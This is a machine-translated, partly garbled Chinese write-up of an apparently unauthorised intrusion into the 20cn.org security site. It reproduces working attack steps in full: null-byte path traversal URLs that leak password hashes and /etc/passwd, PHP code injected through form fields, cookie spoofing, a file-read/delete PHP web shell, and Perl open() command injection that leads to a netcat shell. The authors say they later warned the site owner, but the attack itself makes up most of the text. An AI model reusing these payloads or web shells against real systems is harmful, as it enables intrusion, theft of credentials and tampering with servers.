Brute force attacks-smart script attacks

| = ------- Reproduce the whole process of malicious intrusion 20cn. org ------- = |
| = --------- = [Pskey & envymask] = --------- = |
| = ---------------------------------------- = |

By: envymask <130@21cn.com>
Site: http://envymask.3322.org
Phantom tour: http://www.ph4nt0m.net/bbs/

Author: [c4st] pskey <PsKey@hotmail.com>
Site: http://www.isgrey.com
Group Home: http://c4st.51.net
Group Forum: http://analysist.tocare.net

>>> Dedicated this scrap to Caojing & taozi <

In martial arts, you can take advantage of your flexibility only when you are not willing to give full play to your skills. Today, when firewalls are widely used to implement access control policies between networks, the ever-ignored cgi security has quietly emerged. Various script attacks are widely used under the firewall's "approval, simple scripts are essentially hidden in the dark. This article is a real reproduction of the whole process of intruding 20 CN with Script defects in good faith, trying to give you some fun and inspiration.

20cn. org (20cn Network Security Team) is a well-known hacker/Security site in China. By accident, we started a security test on her.

Without any hesitation, we can start from the Web directly. It is understood that the 20cn full-Site program is compiled by the site master netdemon. Based on the consideration of code size and complexity, we focus on Website forums. We are used to viewing user information first, because the user name and password are always kept together, and here we are more likely to access the information we desire. Submit the following URL to view the netdemon user information:

Http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl? User = netdemon
Normal Return of user information

Http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl? User =./netdemon
Error message: a problem occurred in the forum system!

Http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl? User = netdemon % 00
The "Number of posts" in the returned user information shows an inexplicable string, and some other information is messy.

It seems that there is a problem here. What is the problem with this string? After logging in with the previously applied ID, we can see that each URL's QUERY_STRING is followed by a variable named key, and its value is similar to the preceding string. Is this a password? After logging in several times, we can see that this key value is different each time. It seems that this key is used to identify us in the forum and should have no direct relationship with the user password... still ignore the key value first, continue to experiment with our ID, submit this URL

Http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl? User = envymask % 00

It is a string similar to the previous one. At this time, we boldly guess that this string is our password. After verification, we found that this is indeed the string obtained by encrypting our password with standard des. This proves that our guess is correct. The string contains the encrypted user password. But why does the password slip out? So we went on to speculate that there must be two files in the user data directory that store each user's information, one with a password, and the other without some general information, such as the mailbox, birthday. The two files should be username and username. XXX (with a suffix ). Userinfo. the PL program does not completely filter the user variable when using the open function to open the file. At least/0 is not filtered out, which makes it attempt to open username. when the xxx file is opened, it is not username. XXX is username. The code for opening the file may be written in this way: open (F, "$ path/$ username. XXX "); so when user = abcdef % 00, it is equivalent to open (F," $ path/abcdef "). In this file, it is the file that saves the user password, therefore, some user information variables are taken incorrectly in the file and then fed back to the user, so that the password will come out. Cool... we immediately found the webmaster's netdemon password. After the idea of brute force cracking flashed, we could see if we could further break through this directory, So we submitted

Http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl? User = ../etc/passwd % 00

The password file is out. It seems there is something to start with. Continue.

Http://www.20cn.org/cgi-bin/club/scripts/userinfo.pl? User = ../etc/% 00

Restricted by the page output format, we can only view some files and directories in the/etc directory. Therefore, we try to open some files, but we can only view some small fragments of the files, it was almost useless. After reading a lot of files in a row, there were no new breakthroughs, and we were a little disappointed. So we put this bug aside for the moment to see if there are any other file defects, and continue to find some CGI programs such as display. pl, show. PL and so on, none of which can be broken through, because these files have been filtered, it seems that this path is no longer available.

Since CGI cannot be broken through, there is only another way to do it. We hold the userinfo. PL looks at some fragment files and directories everywhere, first searches for Apache configuration files, and finally finds httpd in the/usr/local/etc/Apache directory. conf, but you can only view the first few lines of the file, which is useless at all. I ran to the/home directory and looked at it again. Well, there are a lot of users, more than the previous ones in/etc/passwd, because when viewing/etc/passwd, you can only see the first few lines, and randomly enter a user's tomy directory, example, and see the directory/public_html, it seems that the system may allocate a space to each user to publish a personal homepage. It is interesting to see if the browser can access the personal homepage.

Http://www.20cn.org /~ Tomy

Oh, I saw this guy's personal homepage and looked at the stuff in it. At this moment, we accidentally saw a/phpMyAdmin directory and accessed it immediately. I found that there was no password verification. Now we get a MySQL user. We try to write something to the database through phpMyAdmin. The content is a small phpshell, and then export it to the Home Directory, busy for a long time, I finally wrote it all in, but when I wrote it to the hard disk, I found that I didn't have the permission to write it. It was a bit depressing...

I continued to view the directories of several users. Most of them didn't publish more things, but there were some static pages. After some efforts, we finally found the user shuaishuai (Shuai), and turned to his homepage for release.

Http://www.20cn.org /~ Shuaishuai/show. php? Filename=20030329185337.txt

Good guy. Check if you can jump to the directory.

Http://www.20cn.org /~ Shuaishuai/show. php? Filename = ../etc/passwd

The following items are returned to us.
Warning: is_file () [function. is-file]: Safe mode restriction in effect. the script whose uid is 1007 is not allowed to access. /Data //.. /.. /.. /.. /.. /.. /etc/passwd owned by UID 0 in/usr/home/shuaishuai/public_html/Show. PHP on line 77

Failed, but not cannot jump, just no permission. Well, let's try again to see if we can view files with permissions.

Http://www.20cn.org /~ Shuaishuai/show. php? Filename =.../../home/shuaishuai/public_html/post. php

Haha, we succeeded. We saw the source code of the Post. php file, which is great. We will take this as a breakthrough. However, this operation only allows you to view shuaishuai files. You cannot view other files, but it does not seem sufficient to view the files. We hope to get a shell, which seems difficult. Let's look at other things. In fact, there are quite a lot of things on shuaishuai's homepage. There is also a message board, which is X-pad. this message board allows users to leave a message after registration. Each registered user has a configuration file under the/user directory, keeping some user information, after viewing the source code of the registration file, we found that it was not completely filtered. At least one variable allowed us to insert our code. So we applied for a user to insert our code in the homepage field to make our user configuration file look like this:

<?
$ User_psw = "1234 ";
$ User_qq = "";
$ User_email = "";
$ User_homepage = "http: //"; copy ($ A, $ B); unlink ($ );#";
$ User_avatar = "styles/avatars/blank.gif ";
$ User_bbsmode = "0 ";
?>

The above PHP file allows us to upload files to the specified directory and delete files with the permission to be deleted. However, during the execution, we find that the file cannot be deleted. Why? I didn't see it clearly

$ User_homepage = "http: //"; copy ($ A, $ B); unlink ($ );#";

In this line, the '(quotation marks)' we submitted is automatically inserted before '/', so that it is not the double quotation mark (") in the PHP statement, but the '(") in the variable ("). That is, the value of $ user_homepage variable is "http: //"; copy ($ A, $ B); unlink ($, it does not play the expected role. It seems that magic_quotes_gpc = on will fail.

No discouraged, we continue to patiently look for other things that can be used, and soon we found the http://www.20cn.org /~ Shuaishuai/down_sys. after viewing the Directory and viewing the downloaded system source files (because we have the permission to view the files in this directory), the Administrator user files are found under the down_sys/data/user/directory, the password is included, but it is a headache that the administrator password is encrypted with MD5. At this time, we did not give up the encrypted password. We immediately checked the Administrator verification code at/down_sys/admin/global. the PHP file contains the cookie authentication method. The related code is as follows:
......
If (isset ($ password) $ Password = MD5 ($ password );
If (empty ($ username) $ username = $ http_cookie_vars ['bymid '];
If (empty ($ password) $ Password = $ http_cookie_vars ['bympwd '];

If (! Checkpass ($ username, $ password )){
Admintitle ();
Adminlogin ();
Exit;
}
......

You can perform a cookie spoofing. Here we use a cumbersome method:
First disconnect the network, change our IP address to the IP address of 20cn.org, and then point the domain name www.20cn.org to the IP address of 20cn.org in the % SystemRoot %/system32/Drivers/etc/hosts file, this step is to successfully resolve www.20cn.org to its IP address when the network is disconnected. finally, create a virtual directory/~ in our IIS /~ Shuaishuai/down_sys/admin/writes an ASP file and sets the cookie as the administrator's username and password. The ASP file content is as follows:

<%
Response. Cookies ("bymid") = "adminuser"
Response. Cookies ("bympwd") = "596a96cc7bf91abcd896f33c44aedc8a"
%>

Then access the ASP file.

Http://www.20cn.org /~ Shuaishuai/down_sys/admin/cookie. asp

Keep this window, change the IP address back to the original 192.168.0.1, and then use this window to request

Http://www.20cn.org /~ Shuaishuai/down_sys/admin. php

The management interface is displayed and verified. Next, let's upload a file... but the next thing annoyed us for a long time. We didn't even have the file upload function. Is fiant a semi-finished product that has not been fully developed? Are you totally disappointed? No, we are still confident. Next we can check other files to see if we can operate on the configuration file. We found a class. PHP, which stores some software classification information of the download system. The content looks like this:

5 | Security Tools | 1028372222
8 | Hongke tool | 1034038173
7 | Other applications | 1034202097
....
We tried to write something into it, so we added a new primary category on the Management page. The category name is "<? Copy ($ A, $ B); unlink ($ A);?> ", After the submission, class. php becomes like this

5 | Security Tools | 1028372222
8 | Hongke tool | 1034038173
7 | Other applications | 1034202097
9 | <? Copy ($ A, $ B); unlink ($ A);?> | 1054035604

This PHP file allows us to upload files to a directory with the permission and delete files with the permission to be deleted. So we wrote a form locally, uploaded a phpshell, and then accessed

Http://www.20cn.org /~ Shuaishuai/down_sys/data/SH. php

Good, back to the phpshell interface... after a while, we found that this phpshell can not execute any command, the original website PHP opened the safe_mode function, restrict us to execute the command. However, we have made a great breakthrough in uploading files to the server. Next, we use PHP's rich built-in functions to write a lot of small scripts for uploading and testing. Unfortunately, the system uses disable_functions to disable most file system functions and directory functions... fortunately, we did not try our best. Finally, we wrote the following PHP program to view some directories and files with permissions:

<?
$ C = $ http_get_vars ["C"];
$ F = $ http_get_vars ["F"];
If ($ c = "file "){
$ File = readfile ($ F );
Echo $ file;
}
If ($ c = "dir "){
$ H = opendir ($ F );
While ($ file = readdir ($ H )){
Echo "$ File/N ";
}
}
If ($ c = "Del "){
Unlink ($ F );
}
?>

After a lot of attempts, we found that new breakthroughs could not be made in PHP. Fortunately, we can use the above PHP program to view the complete code of the script in the www.20cn.org/cgi-bin/club/scripts/ directory, so we decided to switch back to the starting point and view the CGI File. Because we didn't have the permission to write a file into the directory where the CGI program can be executed, it was unrealistic to write a new CGI program to execute commands, so we decided to use the existing. PL program to insert commands, the goal is naturally put on open functions of Perl, So we began to find which programs use open functions, but found a lot. PL files are not found, but there are many readfile () functions. I remember that Perl does not have this function, but a lot of readfile () is used here. Why? This must be a function defined by them. the first few lines of the pl file all have a use club. Originally, there is a module, so you can view the club. PM, and soon found the OPEN function.

Sub readkey {
My ($ file) = @_;
Unless (open (FH, "$ file ")){
Errmsg ("Sorry! You have timed out. Please <a href =/"$ login_page/" target =/"_ parent/"> log on again </a> ");
Exit;
}
Unless (flock (FH, lock_sh )){
Errmsg ("can't lock file: $ file ");
}
My $ DATA = <FH>;
Close (FH );
Return $ data;
}

This is the custom readfile function. It confirms our conjecture and finds an open function that meets the requirements. Then, it searches for the file to call this function, soon we found this function call in the change_pw.pl program, which is used to modify the user's password. Unfortunately, the Code calls readkey () before determining whether the user's old password is correct () function:

My $ key_info = readkey ("$ key_dir/$ key ");

Submit

Http://www.20cn.org/cgi-bin/club/scripts/change_pw.pl? Passwd0 = 1 & passwd1 = 22 & passwd2 = 22 & Key = .. /.. /.. /.. /.. /.. /.. /.. /bin/ls % 20> BBB % 20 |

Check again

Http://www.20cn.org/cgi-bin/club/scripts/bbb

Yeah! Successfully executed... the expected result is displayed, which is really amazing. You can use this to execute the command, which is equivalent to getting a shell. However, this process is inconvenient, and we cannot view our running results in a timely manner. Therefore, we uploaded another file, compiled and executed, and then

D:/temp> nc-VV www.20cn.org 12345
Www.20cn.org [211.161.57.29] 12345 (?) Open
ID
Uid = 80 (WWW) gid = 80 (WWW) groups = 80 (WWW)
Uname-
FreeBSD ns8.20cn.com 4.8-release FreeBSD 4.8-release #1: Wed APR 2 07:01:40 CST 2003 root@ns8.20cn.com:/usr/obj/usr/src/sys/20cn i386

Oh, it's FreeBSD 4.8-release. The version is very high and it's difficult to upgrade the permission. We haven't found a valid local Exploit for a long time, and failed to escalate the permission, so we have to leave it alone.

Here, our hacking is basically over. Although the root account is not obtained, at least the website Web permission is obtained. For our cgi security fans, it should have been completed -). Then, we quickly contacted the website owner to remind him that the website had security risks, but the website owner did not ask us for details. He fixed the vulnerability by analyzing logs.